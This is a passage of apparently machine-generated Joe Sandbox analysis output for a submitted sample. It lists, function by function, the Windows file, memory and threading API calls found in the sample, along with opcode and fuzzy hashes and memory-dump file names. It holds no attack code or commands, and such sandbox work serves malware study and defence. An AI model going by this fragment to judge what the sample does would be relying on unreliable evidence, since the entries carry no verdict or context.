                                                                                            • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                                                          • String ID: ExecuteFile
                                                                                          • API String ID: 1306139538-323923146
                                                                                          • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                                          • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
                                                                                          • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                                          • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                                          • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@memmove
                                                                                          • String ID:
                                                                                          • API String ID: 3828600508-0
                                                                                          • Opcode ID: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                                          • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                                                          • Opcode Fuzzy Hash: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                                          • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID: @
                                                                                          • API String ID: 1890195054-2766056989
                                                                                          • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                                          • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                                                          • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                                          • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID: lA
                                                                                          • API String ID: 613200358-262130271
                                                                                          • Opcode ID: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                                          • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                                                          • Opcode Fuzzy Hash: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                                          • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 1329742358-0
                                                                                          • Opcode ID: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                                          • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                                                          • Opcode Fuzzy Hash: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                                          • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@
                                                                                          • String ID:
                                                                                          • API String ID: 1936579350-0
                                                                                          • Opcode ID: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                                          • Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
                                                                                          • Opcode Fuzzy Hash: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                                          • Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@
                                                                                          • String ID:
                                                                                          • API String ID: 1936579350-0
                                                                                          • Opcode ID: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                                          • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                                                          • Opcode Fuzzy Hash: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                                          • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                                          • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                                                          • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                                          • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                                                          APIs
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@
                                                                                          • String ID:
                                                                                          • API String ID: 613200358-0
                                                                                          • Opcode ID: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                                          • Instruction ID: 6a7e44d1361fbcc4c06fb61f3001a61fff325a62d5d84498b6a11b5e2c7c739c
                                                                                          • Opcode Fuzzy Hash: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                                          • Instruction Fuzzy Hash: BBB0923280C260AEBA3A3E15F9038C967D5EF1023A321856FF089112656E972D92668C
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                                          • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                                                          • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                                          • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                                          • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                                                          • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                                          • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                                                          APIs
                                                                                          • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                                          • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                                                          • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                                          • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                                                          APIs
                                                                                            • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFileHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3498533004-0
                                                                                          • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                                          • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                                                          • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                                          • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3934441357-0
                                                                                          • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                                          • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                                                          • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                                          • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: _beginthreadex
                                                                                          • String ID:
                                                                                          • API String ID: 3014514943-0
                                                                                          • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                                          • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                                                          • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                                          • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                                                          APIs
                                                                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                                          • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                                                          • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                                          • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                                          • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                                                          • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                                          • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                                                          APIs
                                                                                          • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileTime
                                                                                          • String ID:
                                                                                          • API String ID: 1425588814-0
                                                                                          • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                                          • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                                                          • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                                          • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1033339047-0
                                                                                          • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                                          • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                                                          • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                                          • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
